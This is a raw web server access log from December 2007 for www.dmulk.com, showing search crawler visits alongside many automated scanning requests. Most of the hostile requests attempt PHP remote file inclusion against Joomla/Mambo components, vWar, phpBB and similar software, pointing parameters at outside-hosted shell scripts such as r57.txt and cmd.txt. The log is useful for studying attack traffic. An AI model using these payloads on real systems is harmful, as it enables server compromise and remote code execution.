200.61.165.105 - - [29/Dec/2007:04:00:22 -0800] "GET /logs/access_071215.log//spaw/spaw_control.class.php?spaw_root=http://pocketthemes.com/_tempthemes/AMITBAHL/errorr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
206.221.179.200 - - [29/Dec/2007:04:02:42 -0800] "GET /index.php?option=com_wmtgallery&Itemid=&mosConfig_absolute_path=http://siregars.t35.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
206.221.179.200 - - [29/Dec/2007:04:02:42 -0800] "GET /logs/index.php?option=com_wmtgallery&Itemid=&mosConfig_absolute_path=http://siregars.t35.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
72.36.115.57 - - [29/Dec/2007:04:07:17 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "CazoodleBot/CazoodleBot-0.1 (CazoodleBot Crawler; http://www.cazoodle.com/cazoodlebot; cazoodlebot@cazoodle.com)" "www.dmulk.com"
72.36.115.57 - - [29/Dec/2007:04:07:17 -0800] "GET /logs/access_071004.log HTTP/1.0" 200 70439 "-" "CazoodleBot/CazoodleBot-0.1 (CazoodleBot Crawler; http://www.cazoodle.com/cazoodlebot; cazoodlebot@cazoodle.com)" "www.dmulk.com"
87.106.4.97 - - [29/Dec/2007:04:08:03 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.19.78 - - [29/Dec/2007:04:10:51 -0800] "GET /plans/A4_SCHEMAIC_SECTION.pdf HTTP/1.0" 200 1814141 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.106.4.97 - - [29/Dec/2007:04:11:26 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.4.97 - - [29/Dec/2007:04:11:26 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.4.97 - - [29/Dec/2007:04:11:27 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.126 - - [29/Dec/2007:04:12:22 -0800] "GET /logs/access_071223.log HTTP/1.0" 200 97760 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
210.188.218.110 - - [29/Dec/2007:04:12:33 -0800] "GET /logs/access_071212.log//skin/zero_vote/error.php?dir=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.115.57 - - [29/Dec/2007:04:23:34 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "CazoodleBot/CazoodleBot-0.1 (CazoodleBot Crawler; http://www.cazoodle.com/cazoodlebot; cazoodlebot@cazoodle.com)" "www.dmulk.com"
72.36.115.57 - - [29/Dec/2007:04:23:35 -0800] "GET /logs/access_070716.log HTTP/1.0" 200 34661 "-" "CazoodleBot/CazoodleBot-0.1 (CazoodleBot Crawler; http://www.cazoodle.com/cazoodlebot; cazoodlebot@cazoodle.com)" "www.dmulk.com"
74.6.22.126 - - [29/Dec/2007:04:30:49 -0800] "GET /logs/access_070720.log HTTP/1.0" 200 29646 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [29/Dec/2007:04:30:58 -0800] "GET /logs/access_070806.log HTTP/1.0" 200 23344 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [29/Dec/2007:04:32:19 -0800] "GET /logs/access_071220.log HTTP/1.0" 200 140699 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.28.218 - - [29/Dec/2007:04:32:43 -0800] "GET /mobileoffice/?N=A HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.25.105 - - [29/Dec/2007:04:38:10 -0800] "GET /logs/access_070924.log HTTP/1.0" 200 106285 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.23.167 - - [29/Dec/2007:04:40:03 -0800] "GET /logs/access_070923.log HTTP/1.0" 200 55220 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [29/Dec/2007:04:40:47 -0800] "GET /logs/access_071001.log HTTP/1.0" 200 33494 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [29/Dec/2007:04:40:47 -0800] "GET /logs/access_070922.log HTTP/1.0" 200 143145 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [29/Dec/2007:04:40:59 -0800] "GET /logs/access_071208.log HTTP/1.0" 200 94709 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [29/Dec/2007:04:41:09 -0800] "GET /logs/access_071106.log HTTP/1.0" 200 29238 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.24.113 - - [29/Dec/2007:04:51:34 -0800] "GET /logs/access_070819.log HTTP/1.0" 200 28182 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [29/Dec/2007:04:52:45 -0800] "GET /logs/access_070804.log HTTP/1.0" 200 28778 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [29/Dec/2007:04:52:47 -0800] "GET /logs/access_071002.log HTTP/1.0" 200 70737 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
205.234.219.59 - - [29/Dec/2007:04:54:44 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.219.59 - - [29/Dec/2007:04:54:44 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.219.59 - - [29/Dec/2007:04:54:44 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.219.59 - - [29/Dec/2007:04:55:34 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.219.59 - - [29/Dec/2007:04:59:41 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gonfiabiligamespark.it/flash/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.219.59 - - [29/Dec/2007:05:06:52 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gonfiabiligamespark.it/flash/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.219.59 - - [29/Dec/2007:05:06:53 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gonfiabiligamespark.it/flash/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.178.176.36 - - [29/Dec/2007:05:06:56 -0800] "GET /logs/index.php?lang=gr&filehttp://www.vincent-prado.com/blog/wp.rss.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
66.178.176.36 - - [29/Dec/2007:05:06:57 -0800] "GET /index.php?lang=gr&filehttp://www.vincent-prado.com/blog/wp.rss.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
205.234.219.59 - - [29/Dec/2007:05:07:43 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gonfiabiligamespark.it/flash/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.28.212 - - [29/Dec/2007:05:09:06 -0800] "GET /logs/access_071024.log HTTP/1.0" 200 11603 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [29/Dec/2007:05:10:46 -0800] "GET /plans/ HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [29/Dec/2007:05:16:16 -0800] "GET /logs/access_070812.log HTTP/1.0" 200 37724 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [29/Dec/2007:05:16:16 -0800] "GET /logs/access_071103.log HTTP/1.0" 200 57650 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.169.143.217 - - [29/Dec/2007:05:16:57 -0800] "GET /logs/access_071216.log/1000http://madinaedu.gov.sa/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.143.217 - - [29/Dec/2007:05:16:57 -0800] "GET /1000http://madinaedu.gov.sa/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.143.217 - - [29/Dec/2007:05:16:57 -0800] "GET /logs/1000http://madinaedu.gov.sa/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.143.217 - - [29/Dec/2007:05:17:00 -0800] "GET /logs/access_071122.log/1000http://madinaedu.gov.sa/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.25.11 - - [29/Dec/2007:05:18:04 -0800] "GET /logs/access_071030.log HTTP/1.0" 200 28194 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [29/Dec/2007:05:18:59 -0800] "GET /megumi/Bracelet/?S=A HTTP/1.0" 200 1689 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.24.45 - - [29/Dec/2007:05:20:44 -0800] "GET /presto/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.169.143.217 - - [29/Dec/2007:05:21:04 -0800] "GET /1000http://madinaedu.gov.sa/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.126 - - [29/Dec/2007:05:23:57 -0800] "GET /megumi/Bracelet/?N=A HTTP/1.0" 200 1689 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.106.48.58 - - [29/Dec/2007:05:24:51 -0800] "GET /logs/access_071215.log/1000http://madinaedu.gov.sa/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.48.58 - - [29/Dec/2007:05:24:51 -0800] "GET /1000http://madinaedu.gov.sa/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.48.58 - - [29/Dec/2007:05:24:52 -0800] "GET /logs/1000http://madinaedu.gov.sa/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.48.58 - - [29/Dec/2007:05:25:03 -0800] "GET /logs/access_071122.log/1000http://madinaedu.gov.sa/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.48.58 - - [29/Dec/2007:05:27:21 -0800] "GET /1000http://madinaedu.gov.sa/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.55.196.91 - - [29/Dec/2007:05:31:42 -0800] "GET /logs/access_071215.log/1000http://madinaedu.gov.sa/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.55.196.91 - - [29/Dec/2007:05:31:43 -0800] "GET /1000http://madinaedu.gov.sa/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.55.196.91 - - [29/Dec/2007:05:31:44 -0800] "GET /logs/1000http://madinaedu.gov.sa/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.55.196.91 - - [29/Dec/2007:05:31:55 -0800] "GET /logs/access_071122.log/1000http://madinaedu.gov.sa/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.55.196.91 - - [29/Dec/2007:05:32:08 -0800] "GET /1000http://madinaedu.gov.sa/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.252.231 - - [29/Dec/2007:05:38:13 -0800] "GET /logs//?mosConfig_absolute_path=http://h1.ripway.com/mmm23/test.txt?? HTTP/1.1" 200 27827 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
205.234.252.231 - - [29/Dec/2007:05:38:13 -0800] "GET //?mosConfig_absolute_path=http://h1.ripway.com/mmm23/test.txt?? HTTP/1.1" 200 2962 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
216.75.35.118 - - [29/Dec/2007:05:48:53 -0800] "GET /logs/access_071222.log//vwar/convert/mvcw.php?step=1&vwar_root=http://216.126.65.86/includes/oo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [29/Dec/2007:05:48:53 -0800] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://216.126.65.86/includes/oo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [29/Dec/2007:05:48:53 -0800] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://216.126.65.86/includes/oo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [29/Dec/2007:05:50:09 -0800] "GET /logs/access_071214.log//vwar/convert/mvcw.php?step=1&vwar_root=http://216.126.65.86/includes/oo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.158.9 - - [29/Dec/2007:05:56:30 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.44.158.9 - - [29/Dec/2007:05:56:30 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.44.234.6 - - [29/Dec/2007:05:56:48 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://randymac.com/myevent/var/echo? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
207.44.234.6 - - [29/Dec/2007:05:56:49 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://randymac.com/myevent/var/echo? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
213.52.230.10 - - [29/Dec/2007:05:57:02 -0800] "GET /?mosConfig_absolute_path=http://sagasufx.com/rulez.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.219.59 - - [29/Dec/2007:05:59:43 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.219.59 - - [29/Dec/2007:05:59:43 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.219.59 - - [29/Dec/2007:05:59:43 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.52.230.10 - - [29/Dec/2007:06:00:04 -0800] "GET /logs/access_071214.log/?mosConfig_absolute_path=http://sagasufx.com/rulez.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.52.230.10 - - [29/Dec/2007:06:00:04 -0800] "GET /?mosConfig_absolute_path=http://sagasufx.com/rulez.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
213.52.230.10 - - [29/Dec/2007:06:00:05 -0800] "GET /logs/?mosConfig_absolute_path=http://sagasufx.com/rulez.txt? HTTP/1.1" 200 27822 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.219.59 - - [29/Dec/2007:06:00:33 -0800] "GET /logs/access_071216.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [29/Dec/2007:06:00:40 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [29/Dec/2007:06:00:40 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [29/Dec/2007:06:00:40 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.70.241 - - [29/Dec/2007:06:01:06 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Googlebot-Image/1.0" "www.dmulk.com"
66.249.70.241 - - [29/Dec/2007:06:01:06 -0800] "GET /minamijewelry/html/images/wind_character.jpg HTTP/1.1" 200 2891 "-" "Googlebot-Image/1.0" "www.dmulk.com"
207.58.144.26 - - [29/Dec/2007:06:01:45 -0800] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.20.38 - - [29/Dec/2007:06:05:03 -0800] "GET /tmp/?D=A HTTP/1.0" 200 812 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.58.144.26 - - [29/Dec/2007:06:05:22 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://wespenval.nl/bestel/images/canboy1? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.252.231 - - [29/Dec/2007:06:06:19 -0800] "GET //?mosConfig_absolute_path=http://h1.ripway.com/mmm23/test.txt?? HTTP/1.1" 200 2962 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
205.234.252.231 - - [29/Dec/2007:06:06:19 -0800] "GET /logs//?mosConfig_absolute_path=http://h1.ripway.com/mmm23/test.txt?? HTTP/1.1" 200 27827 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
205.234.219.59 - - [29/Dec/2007:06:10:27 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.219.59 - - [29/Dec/2007:06:10:28 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.219.59 - - [29/Dec/2007:06:10:28 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [29/Dec/2007:06:10:53 -0800] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://wespenval.nl/bestel/images/canboy1? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [29/Dec/2007:06:10:53 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://wespenval.nl/bestel/images/canboy1? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.219.59 - - [29/Dec/2007:06:11:17 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [29/Dec/2007:06:12:35 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [29/Dec/2007:06:12:35 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [29/Dec/2007:06:12:35 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [29/Dec/2007:06:14:06 -0800] "GET /logs/access_071214.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.142.212.185 - - [29/Dec/2007:06:16:00 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [29/Dec/2007:06:16:19 -0800] "GET /megumi/Necklace/2_Turquoise_Bracelet_Green_30.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
66.160.143.69 - - [29/Dec/2007:06:19:09 -0800] "GET /admin.php?include_path=http://www.academycharter.org/webcalendar/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
66.160.143.69 - - [29/Dec/2007:06:19:09 -0800] "GET /logs/admin.php?include_path=http://www.academycharter.org/webcalendar/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
195.56.146.167 - - [29/Dec/2007:06:19:48 -0800] "GET /logs/access_071214.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.56.146.167 - - [29/Dec/2007:06:19:48 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.56.146.167 - - [29/Dec/2007:06:19:49 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.58.144.26 - - [29/Dec/2007:06:20:47 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://wespenval.nl/bestel/images/canboy1? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.26.13 - - [29/Dec/2007:06:21:06 -0800] "GET /bikes/?N=D HTTP/1.0" 200 2036 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.26.63.10 - - [29/Dec/2007:06:24:03 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://usil.us/s/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.144.26 - - [29/Dec/2007:06:24:40 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://wespenval.nl/bestel/images/canboy1? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.19 - - [29/Dec/2007:06:28:49 -0800] "GET /logs/access_070829.log HTTP/1.0" 200 34921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.26.63.10 - - [29/Dec/2007:06:29:18 -0800] "GET /logs/access_071212.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://usil.us/s/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.10 - - [29/Dec/2007:06:29:19 -0800] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://usil.us/s/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.10 - - [29/Dec/2007:06:29:36 -0800] "GET /logs/access_071216.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://usil.us/s/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.10 - - [29/Dec/2007:06:29:58 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://www.usil.us/s/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.144.26 - - [29/Dec/2007:06:30:29 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://wespenval.nl/bestel/images/canboy1? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [29/Dec/2007:06:30:29 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://wespenval.nl/bestel/images/canboy1? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.19.148 - - [29/Dec/2007:06:30:31 -0800] "GET /plans/?M=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.58.144.26 - - [29/Dec/2007:06:31:40 -0800] "GET /logs/access_071214.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://wespenval.nl/bestel/images/canboy1? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
